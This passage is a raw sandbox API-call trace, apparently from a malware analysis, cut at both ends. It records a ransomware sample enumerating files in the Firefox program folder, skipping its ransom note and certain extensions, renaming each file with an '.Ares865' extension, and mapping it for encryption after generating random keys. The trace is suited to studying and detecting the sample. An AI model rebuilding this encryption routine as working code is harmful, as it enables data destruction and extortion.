dwFlags=0x0) returned 1 [0126.018] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x202670, lpName=0x0) returned 0x170 [0126.019] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x2670) returned 0x190000 [0126.131] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.142] lstrcpyW (in: lpString1=0x2cce44e, lpString2="defaults" | out: lpString1="defaults") returned="defaults" [0126.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0126.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2100 [0126.142] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0126.142] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefb46e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x52aed680, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dependentlibs.list", cAlternateFileName="DEPEND~1.LIS")) returned 1 [0126.142] lstrcmpiW (lpString1="dependentlibs.list", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0126.142] lstrcmpiW (lpString1="dependentlibs.list", lpString2="aoldtz.exe") returned 1 [0126.142] lstrcpyW (in: lpString1=0x2cce44e, lpString2="dependentlibs.list" | out: lpString1="dependentlibs.list") returned="dependentlibs.list" [0126.142] lstrlenW (lpString="dependentlibs.list") returned 18 [0126.142] lstrlenW (lpString="Ares865") returned 7 [0126.142] lstrcmpiW (lpString1="bs.list", lpString2="Ares865") returned 1 [0126.142] lstrlenW (lpString=".dll") returned 4 [0126.142] lstrcmpiW (lpString1="dependentlibs.list", lpString2=".dll") returned 1 [0126.142] lstrlenW (lpString=".lnk") returned 4 [0126.143] lstrcmpiW (lpString1="dependentlibs.list", lpString2=".lnk") returned 1 [0126.143] lstrlenW (lpString=".ini") returned 4 [0126.143] lstrcmpiW (lpString1="dependentlibs.list", lpString2=".ini") returned 1 [0126.143] lstrlenW (lpString=".sys") returned 4 [0126.143] lstrcmpiW (lpString1="dependentlibs.list", lpString2=".sys") returned 1 [0126.143] lstrlenW (lpString="dependentlibs.list") returned 18 [0126.143] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.Ares865") returned 65 [0126.143] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list.ares865"), dwFlags=0x1) returned 1 [0126.145] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.146] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=99) returned 1 [0126.146] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.147] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.147] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.147] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x170 [0126.149] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0126.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.150] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.150] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.151] lstrcpyW (in: lpString1=0x2cce44e, lpString2="dictionaries" | out: lpString1="dictionaries") returned="dictionaries" [0126.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0126.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2d2fd0 [0126.151] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0126.151] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefb46e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x25fbbe80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x43470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="firefox.exe", cAlternateFileName="")) returned 1 [0126.151] lstrcmpiW (lpString1="firefox.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0126.151] lstrcmpiW (lpString1="firefox.exe", lpString2="aoldtz.exe") returned 1 [0126.151] lstrcpyW (in: lpString1=0x2cce44e, lpString2="firefox.exe" | out: lpString1="firefox.exe") returned="firefox.exe" [0126.151] lstrlenW (lpString="firefox.exe") returned 11 [0126.151] lstrlenW (lpString="Ares865") returned 7 [0126.151] lstrcmpiW (lpString1="fox.exe", lpString2="Ares865") returned 1 [0126.151] lstrlenW (lpString=".dll") returned 4 [0126.151] lstrcmpiW (lpString1="firefox.exe", lpString2=".dll") returned 1 [0126.151] lstrlenW (lpString=".lnk") returned 4 [0126.152] lstrcmpiW (lpString1="firefox.exe", lpString2=".lnk") returned 1 [0126.152] lstrlenW (lpString=".ini") returned 4 [0126.152] lstrcmpiW (lpString1="firefox.exe", lpString2=".ini") returned 1 [0126.152] lstrlenW (lpString=".sys") returned 4 [0126.152] lstrcmpiW (lpString1="firefox.exe", lpString2=".sys") returned 1 [0126.152] lstrlenW (lpString="firefox.exe") returned 11 [0126.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe.Ares865") returned 58 [0126.152] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe.ares865"), dwFlags=0x1) returned 1 [0126.156] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.156] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=275568) returned 1 [0126.156] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.157] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.157] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.157] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x43770, lpName=0x0) returned 0x170 [0126.159] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43770) returned 0x420000 [0126.171] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.176] lstrcpyW (in: lpString1=0x2cce44e, lpString2="freebl3.chk" | out: lpString1="freebl3.chk") returned="freebl3.chk" [0126.176] lstrlenW (lpString="freebl3.chk") returned 11 [0126.176] lstrlenW (lpString="Ares865") returned 7 [0126.176] lstrcmpiW (lpString1="bl3.chk", lpString2="Ares865") returned 1 [0126.176] lstrlenW (lpString=".dll") returned 4 [0126.176] lstrcmpiW (lpString1="freebl3.chk", lpString2=".dll") returned 1 [0126.176] lstrlenW (lpString=".lnk") returned 4 [0126.176] lstrcmpiW (lpString1="freebl3.chk", lpString2=".lnk") returned 1 [0126.176] lstrlenW (lpString=".ini") returned 4 [0126.176] lstrcmpiW (lpString1="freebl3.chk", lpString2=".ini") returned 1 [0126.176] lstrlenW (lpString=".sys") returned 4 [0126.176] lstrcmpiW (lpString1="freebl3.chk", lpString2=".sys") returned 1 [0126.176] lstrlenW (lpString="freebl3.chk") returned 11 [0126.176] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.Ares865") returned 58 [0126.176] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk.ares865"), dwFlags=0x1) returned 1 [0126.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=899) returned 1 [0126.179] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.180] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.180] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.180] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x170 [0126.181] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x190000 [0126.182] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.184] lstrcpyW (in: lpString1=0x2cce44e, lpString2="freebl3.dll" | out: lpString1="freebl3.dll") returned="freebl3.dll" [0126.184] lstrlenW (lpString="freebl3.dll") returned 11 [0126.184] lstrlenW (lpString="Ares865") returned 7 [0126.184] lstrcmpiW (lpString1="bl3.dll", lpString2="Ares865") returned 1 [0126.184] lstrlenW (lpString=".dll") returned 4 [0126.184] lstrcmpiW (lpString1="freebl3.dll", lpString2=".dll") returned 1 [0126.184] lstrlenW (lpString=".lnk") returned 4 [0126.184] lstrcmpiW (lpString1="freebl3.dll", lpString2=".lnk") returned 1 [0126.184] lstrlenW (lpString=".ini") returned 4 [0126.184] lstrcmpiW (lpString1="freebl3.dll", lpString2=".ini") returned 1 [0126.184] lstrlenW (lpString=".sys") returned 4 [0126.184] lstrcmpiW (lpString1="freebl3.dll", lpString2=".sys") returned 1 [0126.184] lstrlenW (lpString="freebl3.dll") returned 11 [0126.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll.Ares865") returned 58 [0126.184] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll.ares865"), dwFlags=0x1) returned 1 [0126.186] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=302192) returned 1 [0126.186] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.187] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.187] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.187] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x49f70, lpName=0x0) returned 0x170 [0126.189] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49f70) returned 0x420000 [0126.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.206] lstrcpyW (in: lpString1=0x2cce44e, lpString2="gkmedias.dll" | out: lpString1="gkmedias.dll") returned="gkmedias.dll" [0126.206] lstrlenW (lpString="gkmedias.dll") returned 12 [0126.206] lstrlenW (lpString="Ares865") returned 7 [0126.206] lstrcmpiW (lpString1="ias.dll", lpString2="Ares865") returned 1 [0126.206] lstrlenW (lpString=".dll") returned 4 [0126.206] lstrcmpiW (lpString1="gkmedias.dll", lpString2=".dll") returned 1 [0126.206] lstrlenW (lpString=".lnk") returned 4 [0126.206] lstrcmpiW (lpString1="gkmedias.dll", lpString2=".lnk") returned 1 [0126.206] lstrlenW (lpString=".ini") returned 4 [0126.206] lstrcmpiW (lpString1="gkmedias.dll", lpString2=".ini") returned 1 [0126.206] lstrlenW (lpString=".sys") returned 4 [0126.206] lstrcmpiW (lpString1="gkmedias.dll", lpString2=".sys") returned 1 [0126.207] lstrlenW (lpString="gkmedias.dll") returned 12 [0126.207] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll.Ares865") returned 59 [0126.207] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\gkmedias.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\gkmedias.dll.ares865"), dwFlags=0x1) returned 1 [0126.209] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\gkmedias.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.209] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3459696) returned 1 [0126.209] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.210] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.210] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.210] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x34cd70, lpName=0x0) returned 0x170 [0126.212] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x14cd70) returned 0x3030000 [0126.430] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.453] lstrcpyW (in: lpString1=0x2cce44e, lpString2="install.log" | out: lpString1="install.log") returned="install.log" [0126.453] lstrlenW (lpString="install.log") returned 11 [0126.453] lstrlenW (lpString="Ares865") returned 7 [0126.453] lstrcmpiW (lpString1="all.log", lpString2="Ares865") returned -1 [0126.453] lstrlenW (lpString=".dll") returned 4 [0126.453] lstrcmpiW (lpString1="install.log", lpString2=".dll") returned 1 [0126.453] lstrlenW (lpString=".lnk") returned 4 [0126.453] lstrcmpiW (lpString1="install.log", lpString2=".lnk") returned 1 [0126.453] lstrlenW (lpString=".ini") returned 4 [0126.453] lstrcmpiW (lpString1="install.log", lpString2=".ini") returned 1 [0126.454] lstrlenW (lpString=".sys") returned 4 [0126.454] lstrcmpiW (lpString1="install.log", lpString2=".sys") returned 1 [0126.454] lstrlenW (lpString="install.log") returned 11 [0126.454] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\install.log.Ares865") returned 58 [0126.454] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log.ares865"), dwFlags=0x1) returned 1 [0126.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.457] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23274) returned 1 [0126.457] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.458] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.458] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.458] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5df0, lpName=0x0) returned 0x170 [0126.462] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5df0) returned 0x190000 [0126.464] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.466] lstrcpyW (in: lpString1=0x2cce44e, lpString2="libEGL.dll" | out: lpString1="libEGL.dll") returned="libEGL.dll" [0126.466] lstrlenW (lpString="libEGL.dll") returned 10 [0126.466] lstrlenW (lpString="Ares865") returned 7 [0126.466] lstrcmpiW (lpString1="EGL.dll", lpString2="Ares865") returned 1 [0126.466] lstrlenW (lpString=".dll") returned 4 [0126.466] lstrcmpiW (lpString1="libEGL.dll", lpString2=".dll") returned 1 [0126.466] lstrlenW (lpString=".lnk") returned 4 [0126.466] lstrcmpiW (lpString1="libEGL.dll", lpString2=".lnk") returned 1 [0126.466] lstrlenW (lpString=".ini") returned 4 [0126.466] lstrcmpiW (lpString1="libEGL.dll", lpString2=".ini") returned 1 [0126.466] lstrlenW (lpString=".sys") returned 4 [0126.466] lstrcmpiW (lpString1="libEGL.dll", lpString2=".sys") returned 1 [0126.466] lstrlenW (lpString="libEGL.dll") returned 10 [0126.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll.Ares865") returned 57 [0126.466] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\libegl.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\libegl.dll.ares865"), dwFlags=0x1) returned 1 [0126.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\libegl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.469] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=64112) returned 1 [0126.469] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.470] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.470] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfd70, lpName=0x0) returned 0x170 [0126.471] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd70) returned 0x190000 [0126.474] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.475] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.475] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.476] lstrcpyW (in: lpString1=0x2cce44e, lpString2="libGLESv2.dll" | out: lpString1="libGLESv2.dll") returned="libGLESv2.dll" [0126.476] lstrlenW (lpString="libGLESv2.dll") returned 13 [0126.477] lstrlenW (lpString="Ares865") returned 7 [0126.477] lstrcmpiW (lpString1="Sv2.dll", lpString2="Ares865") returned 1 [0126.477] lstrlenW (lpString=".dll") returned 4 [0126.477] lstrcmpiW (lpString1="libGLESv2.dll", lpString2=".dll") returned 1 [0126.477] lstrlenW (lpString=".lnk") returned 4 [0126.477] lstrcmpiW (lpString1="libGLESv2.dll", lpString2=".lnk") returned 1 [0126.477] lstrlenW (lpString=".ini") returned 4 [0126.477] lstrcmpiW (lpString1="libGLESv2.dll", lpString2=".ini") returned 1 [0126.477] lstrlenW (lpString=".sys") returned 4 [0126.477] lstrcmpiW (lpString1="libGLESv2.dll", lpString2=".sys") returned 1 [0126.477] lstrlenW (lpString="libGLESv2.dll") returned 13 [0126.477] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll.Ares865") returned 60 [0126.477] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\libglesv2.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\libglesv2.dll.ares865"), dwFlags=0x1) returned 1 [0126.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\libglesv2.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.479] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549488) returned 1 [0126.480] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.480] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.480] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.481] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x86570, lpName=0x0) returned 0x170 [0126.482] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x86570) returned 0x420000 [0126.503] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.504] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.504] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.522] lstrcpyW (in: lpString1=0x2cce44e, 